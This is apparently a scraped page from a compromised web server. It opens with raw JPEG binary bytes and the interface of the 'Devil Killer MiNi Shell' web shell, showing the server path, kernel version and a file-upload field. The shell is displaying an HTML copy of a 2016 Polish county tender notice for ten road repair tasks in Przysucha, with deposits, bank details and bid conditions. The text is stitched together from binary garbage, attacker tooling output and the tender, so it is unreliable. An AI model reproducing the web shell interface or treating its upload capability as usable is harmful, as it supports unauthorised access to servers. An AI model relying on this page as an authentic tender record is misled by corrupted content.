JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160401/74436-N-2016.html

<p class="kh_header"><b>Przysucha: Wykonanie dziesięciu zadań dotyczących remontów dróg powiatowych na terenie Powiatu Przysuskiego</b><br>
<b>Numer ogłoszenia: 74436 - 2016; data zamieszczenia: 01.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Przysuski , Aleja Jana Pawła II 10, 26-400 Przysucha, woj. mazowieckie, tel. 48 6752553, faks 48 6753672.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przysucha.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dziesięciu zadań dotyczących remontów dróg powiatowych na terenie Powiatu Przysuskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zadań:
Zadanie nr1:
Remont drogi powiatowej Nr 1689W gr. woj. - Myślakowice - Różanna - Wysokin od km 5+295 do km 6+695
Kod CPV: 
45100000-8 Przygotowanie terenu pod budowę,
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233290-8 Instalowanie znaków drogowych,
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki mineralno - bitumicznej  asfaltowej - 50 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości śr  3 cm. oraz robót towarzyszących.
Zadanie nr2:
Remont drogi powiatowej Nr 3326W dr. Nr 48 - Podczasza Wola - Kozieniec - Potworów od km 0+745 do km 1+635,
Kod CPV: 
45100000-8 Przygotowanie terenu pod budowę,
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233290-8 Instalowanie znaków drogowych,
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki mineralno - bitumicznej  asfaltowej - średnio 75 kg/m2, warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości  3 cm. oraz robót towarzyszących.
Zadanie nr3:
Remont drogi powiatowej Nr 3314W Odrzywół - Kadź - Łojków  od km 7+197 do km 7+450,
Kod CPV: 
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233140-2  Roboty drogowe, 
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki  mineralno - bitumicznej asfaltowej - 50 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości  śr. 3 cm. oraz robót towarzyszących.
Zadanie nr4:
Remont drogi powiatowej Nr 3341W Jabłonica - Pogroszyn  od km 1+210 do km 2+825,
Kod CPV: 
45100000-8 Przygotowanie terenu pod budowę,
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233140-2  Roboty drogowe, 
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki  mineralno - bitumicznej asfaltowej - 50 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości  śr. 3 cm. oraz robót towarzyszących.
Zadanie nr5:
Remont drogi powiatowej Nr 3340W Długa Brzezina - Bryzgów - Stefanków od km 3+547 do km 4+382,
Kod CPV: 
45100000-8 Przygotowanie terenu pod budowę,
45111240-2 Roboty w zakresie odwadniania gruntu
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233140-2  Roboty drogowe, 
45233290-8 Instalowanie znaków drogowych,
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki  mineralno - bitumicznej asfaltowej - 100 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości 3 cm. oraz robót towarzyszących.
Zadanie nr6:
Remont drogi powiatowej Nr 3313W Drzewica - Rusinów - Sady Kol. od km 12+095 do km 13+940,
Kod CPV:
45100000-8 Przygotowanie terenu pod budowę,
45111240-2 Roboty w zakresie odwadniania gruntu,
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233290-8 Instalowanie znaków drogowych,
45233292-2 Instalowanie urządzeń ochronnych,
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki  mineralno - bitumicznej asfaltowej średnio - 75 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości 3 cm. oraz robót towarzyszących.
Zadanie nr7:
Remont drogi powiatowej Nr 3329W Potworów - Jamki - Skrzyńsko  od km 4+308 do km 5+340,
Kod CPV:
45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne 
45233220-7 Roboty w zakresie nawierzchni dróg,
45233140-2  Roboty drogowe, 
45233290-8 Instalowanie znaków drogowych,
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki  mineralno - bitumicznej asfaltowej średnio - 75 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości 3 cm. oraz robót towarzyszących.
Zadanie nr8:
Remont drogi powiatowej Nr 3329W Potworów - Jamki - Skrzyńsko od km 15+038 do km 16+220 - chodnik m. Wistka,
Kod CPV:
45100000-8 Przygotowanie terenu pod budowę,
45233222-1 Roboty budowlane w zakresie układania chodników i asfaltowania, 
45233290-8 Instalowanie znaków drogowych,
45233221-4 Malowanie nawierzchni,
45233292-2 Instalowanie urządzeń ochronnych,
Zakres zadania obejmuje wykonanie chodnika z kostki brukowej wraz z robotami towarzyszącymi. 
Zadanie nr9:
Remont drogi powiatowej Nr 3320W Karczówka - Goździków od km 2+172 do km 3+532,
Kod CPV:
45100000-8 Przygotowanie terenu pod budowę,
45233220-7 Roboty w zakresie nawierzchni dróg, 
45233140-2  Roboty drogowe, 
45233290-8 Instalowanie znaków drogowych,
Zakres zadania  obejmuje wykonanie warstwy wyrównawczej z mieszanki  mineralno - bitumicznej asfaltowej - 50 kg/m2,  warstwy ścieralnej z mieszanki mineralno - bitumicznej asfaltowej o grubości śr. 3 cm. oraz robót towarzyszących.
Zadanie nr10:
Remont drogi powiatowej Nr 3322W Drzewica - Bieliny - Gielniów od km 2+936 do km 3+484 - chodnik m. Bieliny,
Kod CPV:
45100000-8 Przygotowanie terenu pod budowę,
45233222-1 Roboty budowlane w zakresie układania chodników i asfaltowania, 
45233290-8 Instalowanie znaków drogowych,
45233221-4 Malowanie nawierzchni,
45233292-2 Instalowanie urządzeń ochronnych,
Zakres zadania obejmuje wykonanie chodnika z kostki brukowej wraz z robotami towarzyszącymi. 
Zamawiający dopuszcza możliwość składania ofert częściowych dotyczących realizacji wybranych przez Wykonawcę zadań. 
Roboty powinny być wykonane zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, zgodnie ze sztuką budowlaną oraz obowiązującymi normami i przepisami prawnymi.
Przedmiot zamówienia opisany został za pomocą dokumentacji projektowej z  przedmiarem robót - załącznik nr 3 (3.1 - 3.10)  do SIWZ oraz specyfikacji technicznych wykonania i odbioru robót budowlanych stanowiących załącznik nr 4 (4.1 - 4.10)  do SIWZ.
Termin realizacji zamówienia (każdego z 10 zadań ):  30 czerwca 2016r.
Zamawiający dopuszcza możliwość wcześniejszego wykonania i rozliczenia zrealizowanych zadań.
Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent, czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych o parametrach techniczno /eksploatacyjno/ użytkowych nie gorszych niż te, podane w opisie przedmiotu zamówienia.  
Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego  jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających. o których mowa w art. 67 ust. 1 pkt 6 Ustawy Prawo zamówień publicznych stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.40-2, 45.10.00.00-8, 45.23.32.90-8, 45.11.12.40-2, 45.11.12.40-2, 45.23.32.92-2, 45.11.12.00-0, 45.23.32.22-1, 45.23.32.21-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępując do przetargu jest obowiązany wnieść wadium na każde z oferowanych do realizacji zadań w wysokości odpowiednio:
Zadanie nr1 - 5 000,00 zł  (słownie: pięć tysięcy 00/100 zł),
Zadanie nr2 - 4 000,00 zł  (słownie: cztery tysiące 00/100 zł),
Zadanie nr3 -700,00 zł  (słownie: siedemset 00/100 zł),
Zadanie nr4 -5 000,00 zł  (słownie: pięć tysięcy 00/100 zł),
Zadanie nr5 -4 000,00 zł  (słownie: cztery tysiące 00/100 zł),
Zadanie nr6 -7 000,00 zł  (słownie: siedem tysięcy 00/100 zł),
Zadanie nr7 - 4 000,00 zł  (słownie: cztery tysiące 00/100 zł),
Zadanie nr8 - 4 500,00 zł  (słownie: cztery tysiące pięćset 00/100 zł),
Zadanie nr9 - 2 000,00 zł  (słownie: dwa tysiące 00/100 zł),
Zadanie nr10 - 2 000,00 zł  (słownie: dwa tysiące 00/100 zł),
Wadium wnosi się przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  
     kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275, z późn. zm.)
Okres ważności wadium  powinien obejmować cały okres związania  ofertą. 
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
Pekao S.A. Oddział w Przysusze ul. Krakowska 33
Nr rachunku: 90 1240 5703 1111 0000 4903 1652 
Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
Wadium wniesione w pieniądzu uważa się za wniesione skutecznie wówczas, gdy przed
upływem terminu do złożenia ofert nastąpi uznanie rachunku zamawiającego. 
Uwaga: Wyklucza się dokonywanie wpłat gotówkowych na rachunek zamawiającego niezależnie od tego, czy wpłata taka dokonywana byłaby w kasie banku prowadzącego rachunek zamawiającego,  czy też innego banku.
Zamawiający postuluje załączenie do oferty potwierdzonej kopii dokumentu stwierdzającego dokonanie przelewu na rachunek bankowy zamawiającego. W przypadku wniesienia wadium w innej formie wykonawca załącza do oferty kopię dokumentu stwierdzającego wniesienie wadium i załącza oryginał tego dokumentu w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia oferty.
Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty
najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego
oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a. ustawy Pzp.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający
zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego
oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia
żądano.
Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu
zwrócono wadium na podstawie Art. 46 ust. 1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami
wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,
pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za
przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp,  z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o których mowa w art. 24 ust. 2 pkt 5 Pzp,   lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.  
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
    leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie     Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą - podpisany załącznik nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie     Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą - podpisany załącznik nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie     Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą - podpisany załącznik nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie     Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą - podpisany załącznik nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie     Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą - podpisany załącznik nr1 do formularza oferty - oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Poza dokumentami potwierdzającymi spełniania warunków udziału w postępowaniu oferta powinna również zawierać:
a) Wypełniony formularz oferty (załącznik nr1 do SIWZ),
b) Wypełnione kosztorysy ofertowe (dla zadań, których dotyczy oferta)
c) Dowody wpłaty wadium na zadania, których dotyczy oferta.
d) Informacja czy wybór  oferty Wykonawcy  prowadził będzie do powstania u Zamawiającego obowiązku podatkowego zgodnie z  przepisami o podatku od towarów i usług -  wypełniony załącznik nr4 do Formularza oferty
Uwaga: 
Jeżeli w zakresie któregoś z oferowanych do realizacji zadań  wybór  oferty Wykonawcy będzie  prowadził do powstania u Zamawiającego obowiązku podatkowego zgodnie z  przepisami o podatku od towarów i usług wówczas Wykonawca powinien złożyć wypełniony załącznik nr4 do każdego z oferowanych zadań oddzielnie.
Jeżeli natomiast wybór  oferty Wykonawcy w zakresie wszystkich oferowanych do realizacji zadań  nie będzie  prowadził do powstania u Zamawiającego obowiązku podatkowego zgodnie z  przepisami o podatku od towarów i usług, wystarczy wówczas złożyć jeden wypełniony załącznik nr4 ( dotyczący wszystkich oferowanych zadań)  
e)  przypadku, gdy wykonawcę w przetargu reprezentuje pełnomocnik oryginał pełnomocnictwa do działania w imieniu wykonawcy lub notarialnie potwierdzony odpis takiego pełnomocnictwa 
f) wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są załączyć oryginał pełnomocnictwa do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia  publicznego.
Dokument pełnomocnictwa powinien być dołączony do oferty i zawierać w szczególności wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego Pełnomocnika oraz zakres jego umocowania. Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym Wykonawcę ustanowionego jako Pełnomocnika przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze  danego Wykonawcy. Stosowne odpisy z rejestru  powinny zostać dołączone do oferty.
Zamawiający żąda, aby w formularzu oferty Wykonawca wskazał części zamówienia, której wykonanie zamierza powierzyć podwykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust1 ustawy Pzp  Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy.
Zamawiający przewiduje również możliwości dokonania istotnej zmiany zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej z uwzględnieniem podawanych warunków ich wystąpienia:
1) Zmiany zakresu zamówienia spowodowane zmianą dokumentacji technicznej skorygowanej przez projektanta i zaakceptowanej przez Zamawiającego,
2) Zmiana sposobu wykonania zamówienia, materiałów budowlanych, sprzętu, urządzań, gdy wykorzystanie materiałów budowlanych, sprzętu, urządzeń wskazanych w dokumentacji projektowej lub ofercie, stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, postępem technologicznym, zwiększeniem bezpieczeństwa na budowie,
